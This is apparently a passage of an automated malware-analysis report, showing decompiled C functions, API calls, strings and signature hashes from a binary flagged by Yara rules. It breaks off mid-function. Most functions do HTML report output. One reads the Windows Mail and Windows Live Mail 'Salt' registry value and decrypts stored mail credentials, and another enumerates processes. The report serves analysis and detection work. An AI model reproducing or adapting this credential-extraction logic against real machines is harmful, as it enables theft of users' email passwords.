                                                  • API ID: strcat$memsetsprintf$strcpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 1662040868-1996832678
                                                  • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                  • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                  • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                  • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040AF17(void* __eax, intOrPtr _a4) {
                                                  				char _v271;
                                                  				char _v532;
                                                  				intOrPtr _v536;
                                                  				char _v540;
                                                  				void _v803;
                                                  				char _v804;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				char* _t47;
                                                  				intOrPtr _t67;
                                                  				WINDOWPLACEMENT* _t73;
                                                  				void* _t75;
                                                  				char* _t83;
                                                  				struct HWND__* _t84;
                                                  				intOrPtr _t88;
                                                  				int _t90;
                                                  
                                                  				_t75 = __eax;
                                                  				_v804 = 0;
                                                  				memset( &_v803, 0, 0x104);
                                                  				GetModuleFileNameA(0,  &_v804, 0x104);
                                                  				_t47 = strrchr( &_v804, 0x2e);
                                                  				if(_t47 != 0) {
                                                  					 *_t47 = 0;
                                                  				}
                                                  				strcat( &_v804, ".cfg");
                                                  				_v536 = _a4;
                                                  				_v540 = 0x413bdc;
                                                  				_v532 = 0;
                                                  				_v271 = 0;
                                                  				strcpy( &_v532,  &_v804);
                                                  				strcpy( &_v271, "General");
                                                  				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                  				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
                                                  				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                  				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                  				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                  				_t67 = _v536;
                                                  				_a4 = _t67;
                                                  				_t90 = 0x2c;
                                                  				if(_t67 != 0) {
                                                  					_t84 =  *(_t75 + 0x108);
                                                  					if(_t84 != 0) {
                                                  						_t73 = _t75 + 0x128;
                                                  						_t73->length = _t90;
                                                  						GetWindowPlacement(_t84, _t73);
                                                  					}
                                                  				}
                                                  				_t83 =  &_v540;
                                                  				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                  				if(_a4 == 0) {
                                                  					E00401896(_t75);
                                                  				}
                                                  				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040AF3C
                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                  • strrchr.MSVCRT ref: 0040AF5C
                                                  • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                  • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                  • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                  • API String ID: 1301239246-2014360536
                                                  • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                  • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                  • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                  • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				void _v79;
                                                  				char _v80;
                                                  				void _v131;
                                                  				char _v132;
                                                  				void _v183;
                                                  				char _v184;
                                                  				char _v236;
                                                  				void _v491;
                                                  				char _v492;
                                                  				void* __edi;
                                                  				void* _t83;
                                                  				void* _t100;
                                                  				char* _t103;
                                                  				intOrPtr* _t120;
                                                  				signed int _t121;
                                                  				char _t139;
                                                  				signed int _t152;
                                                  				signed int _t153;
                                                  				signed int _t156;
                                                  				intOrPtr* _t157;
                                                  				void* _t158;
                                                  				void* _t160;
                                                  
                                                  				_t120 = __ebx;
                                                  				_v492 = 0;
                                                  				memset( &_v491, 0, 0xfe);
                                                  				_t121 = 0xc;
                                                  				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
                                                  				asm("movsb");
                                                  				_t156 = 0;
                                                  				_v132 = 0;
                                                  				memset( &_v131, 0, 0x31);
                                                  				_v184 = 0;
                                                  				memset( &_v183, 0, 0x31);
                                                  				_v80 = 0;
                                                  				memset( &_v79, 0, 0x31);
                                                  				_t160 = _t158 + 0x3c;
                                                  				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                                  				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                                  				if(_t83 != 0xffffffff) {
                                                  					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
                                                  					_t160 = _t160 + 0x14;
                                                  				}
                                                  				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
                                                  				_v8 = _t156;
                                                  				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
                                                  					while(1) {
                                                  						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
                                                  						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
                                                  							strcpy( &_v80, " nowrap");
                                                  						}
                                                  						_v28 = _v28 | 0xffffffff;
                                                  						_v24 = _v24 | 0xffffffff;
                                                  						_v20 = _v20 | 0xffffffff;
                                                  						_v16 = _t156;
                                                  						_t157 = _a8;
                                                  						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
                                                  						E0040F071(_v28,  &_v184);
                                                  						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
                                                  						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
                                                  						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
                                                  						_t153 = _t152 * 0x14;
                                                  						if(_t100 == 0xffffffff) {
                                                  							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
                                                  						} else {
                                                  							_push( *(_t153 + _v12 + 0x10));
                                                  							_push(E0040F071(_t100,  &_v492));
                                                  							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
                                                  							_t160 = _t160 + 0x10;
                                                  						}
                                                  						_t103 =  *(_t120 + 0x50);
                                                  						_t139 =  *_t103;
                                                  						if(_t139 == 0 || _t139 == 0x20) {
                                                  							strcat(_t103, "&nbsp;");
                                                  						}
                                                  						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
                                                  						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
                                                  						E00405EFD(_a4,  *(_t120 + 0x4c));
                                                  						_t160 = _t160 + 0x2c;
                                                  						_v8 = _v8 + 1;
                                                  						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
                                                  							goto L14;
                                                  						}
                                                  						_t156 = 0;
                                                  					}
                                                  				}
                                                  				L14:
                                                  				E00405EFD(_a4, "</table><p>");
                                                  				return E00405EFD(_a4, 0x412b1c);
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 004094A2
                                                  • memset.MSVCRT ref: 004094C5
                                                  • memset.MSVCRT ref: 004094DB
                                                  • memset.MSVCRT ref: 004094EB
                                                  • sprintf.MSVCRT ref: 0040951F
                                                  • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                  • sprintf.MSVCRT ref: 004095ED
                                                  • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                    • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                  • strcpy.MSVCRT(?,?), ref: 00409601
                                                  • sprintf.MSVCRT ref: 00409650
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 2822972341-601624466
                                                  • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                  • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                  • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                  • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00409EC4(void* __eax) {
                                                  				void* _v36;
                                                  				long _v40;
                                                  				void* _v44;
                                                  				void* _v56;
                                                  				long _t21;
                                                  				void* _t24;
                                                  				long _t26;
                                                  				long _t34;
                                                  				long _t37;
                                                  				intOrPtr* _t40;
                                                  				void* _t42;
                                                  				intOrPtr* _t44;
                                                  				void* _t47;
                                                  
                                                  				_t40 = ImageList_Create;
                                                  				_t47 = __eax;
                                                  				_t44 = __imp__ImageList_SetImageCount;
                                                  				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                  					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                  					 *(_t47 + 0x18c) = _t37;
                                                  					 *_t44(_t37, 1);
                                                  					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                  				}
                                                  				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                  					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                  					 *(_t47 + 0x190) = _t34;
                                                  					 *_t44(_t34, 1);
                                                  					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                  				}
                                                  				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                  				 *(_t47 + 0x188) = _t21;
                                                  				 *_t44(_t21, 2);
                                                  				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                  				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                  				_t42 = _t24;
                                                  				 *_t44( *(_t47 + 0x188), 0);
                                                  				_t26 = GetSysColor(0xf);
                                                  				_v40 = _t26;
                                                  				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                  				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                  				DeleteObject(_v56);
                                                  				DeleteObject(_t42);
                                                  				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                  			}

                                                  APIs
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                  • LoadImageA.USER32 ref: 00409F7B
                                                  • LoadImageA.USER32 ref: 00409F97
                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                  • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                  • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                  • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                  • DeleteObject.GDI32(?), ref: 00409FDB
                                                  • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                  • String ID:
                                                  • API String ID: 3411798969-0
                                                  • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                  • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                  • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                  • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E0040B841(signed int __eax, void* __esi) {
                                                  				void* _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  
                                                  				_push("/shtml");
                                                  				L004115B2();
                                                  				if(__eax != 0) {
                                                  					_push("/sverhtml");
                                                  					L004115B2();
                                                  					if(__eax != 0) {
                                                  						_push("/sxml");
                                                  						L004115B2();
                                                  						if(__eax != 0) {
                                                  							_push("/stab");
                                                  							L004115B2();
                                                  							if(__eax != 0) {
                                                  								_push("/scomma");
                                                  								L004115B2();
                                                  								if(__eax != 0) {
                                                  									_push("/stabular");
                                                  									L004115B2();
                                                  									if(__eax != 0) {
                                                  										_push("/skeepass");
                                                  										L004115C4();
                                                  										asm("sbb eax, eax");
                                                  										return ( ~__eax & 0xfffffff8) + 8;
                                                  									} else {
                                                  										_t5 = 3;
                                                  										return _t5;
                                                  									}
                                                  								} else {
                                                  									_t6 = 7;
                                                  									return _t6;
                                                  								}
                                                  							} else {
                                                  								_t7 = 2;
                                                  								return _t7;
                                                  							}
                                                  						} else {
                                                  							_t8 = 6;
                                                  							return _t8;
                                                  						}
                                                  					} else {
                                                  						_t9 = 5;
                                                  						return _t9;
                                                  					}
                                                  				} else {
                                                  					_t10 = 4;
                                                  					return _t10;
                                                  				}
                                                  			}

                                                  APIs
                                                  • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                  • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2884411883-1959339147
                                                  • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                  • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                  • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                  • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				void _v515;
                                                  				char _v516;
                                                  				void _v771;
                                                  				char _v772;
                                                  				void _v1027;
                                                  				char _v1028;
                                                  				char _v1284;
                                                  				char _v2308;
                                                  				char _t47;
                                                  				intOrPtr* _t50;
                                                  				void* _t57;
                                                  				intOrPtr* _t73;
                                                  				void* _t76;
                                                  				void* _t77;
                                                  				void* _t78;
                                                  				void* _t79;
                                                  
                                                  				_v1028 = 0;
                                                  				memset( &_v1027, 0, 0xfe);
                                                  				_v772 = 0;
                                                  				memset( &_v771, 0, 0xfe);
                                                  				_v516 = 0;
                                                  				memset( &_v515, 0, 0xfe);
                                                  				_t77 = _t76 + 0x24;
                                                  				if(_a16 != 0xffffffff) {
                                                  					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
                                                  					_t77 = _t77 + 0x14;
                                                  				}
                                                  				if(_a20 != 0xffffffff) {
                                                  					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
                                                  					strcpy( &_v516, "</font>");
                                                  					_t77 = _t77 + 0x1c;
                                                  				}
                                                  				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                  				E00405EFD(_a4,  &_v2308);
                                                  				_t47 = _a12;
                                                  				_t78 = _t77 + 0x14;
                                                  				if(_t47 > 0) {
                                                  					_t73 = _a8 + 4;
                                                  					_a16 = _t47;
                                                  					do {
                                                  						_v260 = 0;
                                                  						memset( &_v259, 0, 0xfe);
                                                  						_t50 =  *_t73;
                                                  						_t79 = _t78 + 0xc;
                                                  						if( *_t50 == 0) {
                                                  							_v260 = 0;
                                                  						} else {
                                                  							sprintf( &_v260, " width=\"%s\"", _t50);
                                                  							_t79 = _t79 + 0xc;
                                                  						}
                                                  						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                  						_t57 = E00405EFD(_a4,  &_v2308);
                                                  						_t78 = _t79 + 0x20;
                                                  						_t73 = _t73 + 8;
                                                  						_t34 =  &_a16;
                                                  						 *_t34 = _a16 - 1;
                                                  					} while ( *_t34 != 0);
                                                  					return _t57;
                                                  				}
                                                  				return _t47;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf$memset$strcpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 898937289-3842416460
                                                  • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                  • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                  • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                  • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040E0DA() {
                                                  				void* _t1;
                                                  				int _t2;
                                                  				struct HINSTANCE__* _t4;
                                                  
                                                  				if( *0x417518 != 0) {
                                                  					return _t1;
                                                  				}
                                                  				_t2 = LoadLibraryA("psapi.dll");
                                                  				_t4 = _t2;
                                                  				if(_t4 == 0) {
                                                  					L10:
                                                  					return _t2;
                                                  				} else {
                                                  					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                  					 *0x416fec = _t2;
                                                  					if(_t2 != 0) {
                                                  						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                  						 *0x416fe4 = _t2;
                                                  						if(_t2 != 0) {
                                                  							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                  							 *0x416fdc = _t2;
                                                  							if(_t2 != 0) {
                                                  								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                  								 *0x41710c = _t2;
                                                  								if(_t2 != 0) {
                                                  									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                  									 *0x416fe8 = _t2;
                                                  									if(_t2 != 0) {
                                                  										 *0x417518 = 1;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					if( *0x417518 == 0) {
                                                  						_t2 = FreeLibrary(_t4);
                                                  					}
                                                  					goto L10;
                                                  				}
                                                  			}

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-232097475
                                                  • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                  • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                  • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                  • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v6;
                                                  				char _v7;
                                                  				char _v8;
                                                  				int _v12;
                                                  				intOrPtr _v16;
                                                  				void* _v20;
                                                  				short* _v24;
                                                  				unsigned int _v28;
                                                  				char* _v32;
                                                  				int _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				void _v299;
                                                  				char _v300;
                                                  				void _v555;
                                                  				char _v556;
                                                  				char _v1080;
                                                  				void* __esi;
                                                  				int _t56;
                                                  				intOrPtr _t58;
                                                  				intOrPtr _t64;
                                                  				char _t92;
                                                  				char* _t93;
                                                  				void* _t100;
                                                  				signed int _t102;
                                                  				signed int _t107;
                                                  				intOrPtr _t108;
                                                  				void* _t113;
                                                  
                                                  				_t113 = __eflags;
                                                  				_t100 = __edx;
                                                  				_t93 = __eax;
                                                  				E004046D7( &_v1080);
                                                  				if(E004047A0( &_v1080, _t113) != 0) {
                                                  					_t56 = strlen(_t93);
                                                  					asm("cdq");
                                                  					_t107 = _t56 - _t100 >> 1;
                                                  					_t2 = _t107 + 1; // 0x1
                                                  					_t58 = _t2;
                                                  					L004115D0();
                                                  					_t102 = 0;
                                                  					_t96 = _t58;
                                                  					_v16 = _t58;
                                                  					if(_t107 > 0) {
                                                  						do {
                                                  							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                  							_v7 = _t93[1 + _t102 * 2];
                                                  							_v6 = 0;
                                                  							_t92 = E00406512( &_v8);
                                                  							_t96 = _v16;
                                                  							 *((char*)(_t102 + _v16)) = _t92;
                                                  							_t102 = _t102 + 1;
                                                  						} while (_t102 < _t107);
                                                  					}
                                                  					_v556 = 0;
                                                  					memset( &_v555, 0, 0xff);
                                                  					_v12 = 0;
                                                  					_v300 = 0;
                                                  					memset( &_v299, 0, 0xfe);
                                                  					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                  					if(_t64 != 1) {
                                                  						__eflags = _t64 - 2;
                                                  						if(_t64 == 2) {
                                                  							_push("Software\\Microsoft\\Windows Live Mail");
                                                  							goto L7;
                                                  						}
                                                  					} else {
                                                  						_push("Software\\Microsoft\\Windows Mail");
                                                  						L7:
                                                  						strcpy( &_v300, ??);
                                                  						_pop(_t96);
                                                  					}
                                                  					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                  						_v12 = 0xff;
                                                  						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                  						RegCloseKey(_v20);
                                                  					}
                                                  					_v40 = _v16;
                                                  					_v36 = _v12;
                                                  					_v32 =  &_v556;
                                                  					_v44 = _t107;
                                                  					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                  						_t108 = _a8;
                                                  						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                  						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                  						LocalFree(_v24);
                                                  					}
                                                  					_push(_v16);
                                                  					L004115D6();
                                                  				}
                                                  				return E004047F1( &_v1080);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • strlen.MSVCRT ref: 0041054C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                  • memset.MSVCRT ref: 004105A8
                                                  • memset.MSVCRT ref: 004105C5
                                                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                  • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                  • LocalFree.KERNEL32(?), ref: 0041069D
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                    • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                  Strings
                                                  • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                  • Salt, xrefs: 00410621
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                  • API String ID: 1673043434-2687544566
                                                  • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                  • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                  • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                  • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				void _v619;
                                                  				char _v620;
                                                  				void _v1231;
                                                  				char _v1232;
                                                  				void* __edi;
